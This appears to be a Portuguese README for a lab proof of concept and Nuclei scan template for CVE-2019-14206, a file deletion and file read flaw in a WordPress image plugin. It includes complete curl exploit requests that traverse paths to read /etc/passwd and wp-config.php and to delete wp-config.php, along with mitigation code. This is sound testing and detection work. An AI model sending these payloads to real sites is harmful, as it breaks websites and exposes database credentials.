# CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion

## 📋 **Índice**

1. [Sobre a Vulnerabilidade](#sobre-a-vulnerabilidade)
2. [Pré-requisitos](#pré-requisitos)
3. [Instalação](#instalação)
4. [Métodos de Teste](#métodos-de-teste)
   - [Teste Rápido](#1-teste-rápido)
   - [Teste Completo com Docker](#2-teste-completo-com-docker)
   - [Teste com Nuclei](#3-teste-com-nuclei)
   - [Teste Manual](#4-teste-manual)
5. [Interpretando Resultados](#interpretando-resultados)
6. [Limpeza](#limpeza)
7. [Solução de Problemas](#solução-de-problemas)
8. [Mitigação](#mitigação)
9. [Aviso Legal](#aviso-legal)

---

## 🎯 **Sobre a Vulnerabilidade**

**CVE-ID:** CVE-2019-14206  
**Severity:** High (CVSS 6.5)  
**Plugin Afetado:** Adaptive Images for WordPress  
**Versões Afetadas:** < 0.6.67

### **O que essa vulnerabilidade permite?**

Esta vulnerabilidade permite que um atacante remoto e não autenticado **delete arquivos arbitrários** no servidor WordPress explorando o plugin Adaptive Images.

### **Impacto Real:**

- ❌ **Deleção de wp-config.php** causando pane completa no site
- ❌ **Exposição de credenciais** do banco de dados via LFI
- ⚠️ **Corrente de ataque** levando a RCE (Remote Code Execution)
- 🔴 **Comprometimento total** do site WordPress

### **Causa Raiz:**

```php
// O plugin usa input do usuário SEM sanitização
$settings = $_REQUEST['adaptive-images-settings'];

// Constrói caminho de arquivo com parâmetros controlados pelo atacante
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// DELETA arquivo arbitrário
unlink($cache_file);
```

---

## 💻 **Pré-requisitos**

### **Requisitos Mínimos:**

- **Sistema Operacional:** macOS, Linux ou Windows
- **Nuclei:** Versão 3.0 ou superior ([Instalar](https://github.com/projectdiscovery/nuclei/releases))
- **Bash:** Versão 4.0 ou superior
- **curl:** Para testes manuais
- **PHP:** Versão 7.0+ (opcional, para testes com servidor built-in)

### **Verificando Pré-requisitos:**

```bash
# Verificar Nuclei
nuclei --version

# Verificar Bash
bash --version

# Verificar curl
curl --version

# Verificar PHP (opcional)
php --version 2>/dev/null || echo "PHP não disponível (opcional)"
```

---

## 🚀 **Instalação**

### **Passo 1: Clonar ou Baixar os Arquivos**

```bash
# Se estiver no diretório nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Ou baixe os arquivos necessários
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates
```

### **Passo 2: Verificar Estrutura de Arquivos**

```bash
# Verificar se os arquivos existem
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/
```

### **Passo 3: Tornar Scripts Executáveis**

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh
```

---

## 🧪 **Métodos de Teste**

### **1. Teste Rápido** ⏱️ *2 minutos*

Execute a demonstração completa que simula toda a exploração:

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh
```

**O que acontece:**
- Cria ambiente de teste completo
- Simula a vulnerabilidade
- Demonstra deleção de arquivo
- Valida template Nuclei

**Saída esperada:**
```
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready
```

---

### **2. Teste Completo com Docker** 🐳 *10 minutos*

#### **Passo 1: Iniciar Ambiente Docker**

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Se Docker estiver rodando
docker-compose up -d

# Se Docker NÃO estiver rodando, use o simulador
./docker-test-full.sh
```

#### **Passo 2: Acessar WordPress**

```bash
# O ambiente estará disponível em
# http://localhost:8888
```

#### **Passo 3: Verificar Plugin Vulnerável**

```bash
# Verificar se o script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
```

#### **Passo 4: Executar Testes**

```bash
# Teste LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Teste File Deletion
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php
```

---

### **3. Teste com Nuclei** 🎯 *5 minutos*

#### **Passo 1: Preparar Lista de Alvos**

```bash
# Criar arquivo de alvos
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF
```

#### **Passo 2: Executar Scan**

```bash
# Scan básico
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Scan detalhado
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Scan com debug (OBRIGATÓRIO para bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Salvar resultados
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt
```

#### **Passo 3: Interpretar Resultados**

```bash
# Ver resultados
cat results.txt

# Resultados positivos terão:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
```

---

### **4. Teste Manual** 🔧 *10 minutos*

#### **Passo 1: Iniciar Servidor PHP**

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888
```

#### **Passo 2: Testar LFI (Leitura de Arquivos)**

```bash
# Tentar ler /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Tentar ler wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"
```

**Resultado esperado (LFI):**
```
=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd
```

#### **Passo 3: Testar Deleção de Arquivos**

```bash
# Verificar se wp-config.php existe ANTES
ls -la wp-config.php

# Executar exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado DEPOIS
ls -la wp-config.php
```

**Resultado esperado (File Deletion):**
```
[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php
```

---

## 📊 **Interpretando Resultados**

### **Resultado Positivo (Vulnerável):**

```
[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible
```

### **Resultado Negativo (Não Vulnerável):**

```
[N/A] No results found
```

### **Possíveis Razões para Falso Negativo:**

- ✅ Plugin não instalado
- ✅ Plugin atualizado (versão >= 0.6.67)
- ✅ WAF bloqueando requisições
- ✅ Servidor não responde nos caminhos esperados

---

## 🧹 **Limpeza**

### **Limpar Ambiente de Teste:**

```bash
# Remover ambiente Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# Remover arquivos de teste
rm -rf docker-test/
rm -f targets.txt results.txt

# Restaurar wp-config.php se foi deletado
cat > wp-config.php << 'EOF'
<?php
// Arquivo restaurado
define('DB_NAME', 'wordpress');
EOF
```

### **Limpar Nuclei:**

```bash
# Remover resultados de scan
rm -f results.txt

# Limpar cache (opcional)
nuclei -rm-cache
```

---

## 🔧 **Solução de Problemas**

### **Problema 1: Nuclei não encontrado**

```bash
# Instalar Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Ou baixar binário
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.0.0/nuclei-linux-amd64.zip
unzip nuclei-linux-amd64.zip
chmod +x nuclei
sudo mv nuclei /usr/local/bin/
```

### **Problema 2: Template não carrega**

```bash
# Verificar se arquivo existe
ls -la http/cves/2019/CVE-2019-14206.yaml

# Verificar sintaxe YAML
python3 -c "import yaml; yaml.safe_load(open('http/cves/2019/CVE-2019-14206.yaml'))"

# Usar caminho absoluto
nuclei -t /Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml -u http://target
```

### **Problema 3: PHP server não inicia**

```bash
# Verificar porta
lsof -i :8888

# Usar porta diferente
php -S localhost:9999

# Verificar PHP instalado
which php
php --version
```

### **Problema 4: Docker não roda**

```bash
# Verificar status Docker
docker ps

# Iniciar Docker
# No macOS: Abrir Docker Desktop
# No Linux: sudo systemctl start docker

# Usar modo simulador (funciona sem Docker)
./docker-test-full.sh
```

---

## 🛡️ **Mitigação**

### **Proteção Imediata:**

1. **Atualizar Plugin:**
   ```
   Painel WordPress > Plugins > Atualizar Adaptive Images
   ```

2. **Versão Segura:** >= 0.6.67

3. **Remover Plugin Vulnerável:**
   ```
   rm -rf wp-content/plugins/adaptive-images/
   ```

### **Proteção no Código (Para Desenvolvedores):**

```php
// ✅ CÓDIGO SEGURO (Exemplo de correção)
function adaptive_images_script_get_settings() {
    // Sanitizar input
    $allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
    $settings = [];
    
    foreach ($allowed_keys as $key) {
        if (isset($_REQUEST['adaptive-images-settings'][$key])) {
            $settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
        }
    }
    
    return $settings;
}

function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
    // Validar caminhos
    $allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
    $cache_dir = basename(dirname($cache_file));
    
    if (!in_array($cache_dir, $allowed_cache_dirs)) {
        return false; // Recusar caminhos inválidos
    }
    
    // Usar caminhos absolutos validados
    $cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
    
    if (file_exists($cache_file)) {
        unlink($cache_file);
    }
}
```

---

## ⚠️ **Aviso Legal**

### **Termos de Uso:**

Este material é fornecido **exclusivamente para fins educacionais e de teste de segurança**.

### **O que você PODE fazer:**

- ✅ Testar em sistemas que você possui
- ✅ Usar em ambientes de laboratório
- ✅ Aprendendo sobre vulnerabilidades web
- ✅ Contribuindo com segurança open source
- ✅ Testando suas próprias aplicações

### **O que você NÃO PODE fazer:**

- ❌ Testar em sistemas sem autorização
- ❌ Causar danos ou interrupções
- ❌ Utilizar para fins maliciosos
- ❌ Vender ou distribuir exploits
- ❌ Publicar informações de sistemas vulneráveis

### **Responsabilidade:**

O autor e contributors **NÃO se responsabilizam** por qualquer:
- Uso indevido deste material
- Danos causados a sistemas
- Perdas de dados
- Interrupções de serviço
- Problemas legais

### **Divulgação Responsável:**

Se você encontrar esta vulnerabilidade em sistemas reais:

1. **NÃO** exploite ou cause danos
2. **DOCUMENTE** a vulnerabilidade
3. **NOTIFIQUE** o responsável pelo sistema
4. **SIGA** as diretrizes de responsible disclosure

---

## 📚 **Recursos Adicionais**

### **Referências:**

- [NVD - CVE-2019-14206](https://nvd.nist.gov/vuln/detail/CVE-2019-14206)
- [Research Original](https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown)
- [Plugin Oficial](https://wordpress.org/plugins/adaptive-images/)
- [WPScan Entry](https://wpscan.com/vulnerability/9463)

### **Ferramentas Relacionadas:**

- [Nuclei](https://github.com/projectdiscovery/nuclei)
- [ nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
- [WPScan](https://wpscan.com/)
- [Wordfence](https://www.wordfence.com/)

---

## 🎓 **Aprendizados**

Este projeto demonstra:

1. **Input Validation:** A importância de sanitizar toda entrada do usuário
2. **Path Traversal:** Como caminhos de arquivo podem ser manipulados
3. **File Operations:** Os riscos de funções como unlink() com input do usuário
4. **Plugin Security:** Vulnerabilidades comuns em plugins WordPress
5. **CVE Analysis:** Como analisar e reproduzir vulnerabilidades
6. **Detection Development:** Como criar templates de detecção eficazes

---

## 📝 **Changelog**

### **Versão 1.0.0** (2026-01-04)
- ✅ Template Nuclei criado
- ✅ Ambiente PoC completo
- ✅ Documentação completa
- ✅ Scripts de teste validados
- ✅ Demonstração funcional

---

## 🤝 **Contribuição**

Contribuições são bem-vindas! Para contribuir:

1. Fork o repositório
2. Crie uma branch (`git checkout -b feature/improvement`)
3. Commit suas mudanças (`git commit -am 'Add improvement'`)
4. Push para a branch (`git push origin feature/improvement`)
5. Crie um Pull Request

---

## 📧 **Suporte**

Para dúvidas ou problemas:

1. Verifique a seção [Solução de Problemas](#solução-de-problemas)
2. Verifique os [issues do repositório](https://github.com/projectdiscovery/nuclei-templates/issues)
3. Documentar o problema com:
   - Sistema operacional
   - Versão do Nuclei
   - Versão do PHP (se aplicável)
   - Mensagem de erro completa
   - Passos para reproduzir

---

**🎉 Obrigado por usar este material de teste!**

Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use este conhecimento para tornar a internet mais segura, não mais vulnerável.

---

**Criado:** 4 de Janeiro de 2026  
**Versão:** 1.0.0  
**Status:** ✅ Pronto para uso em produção
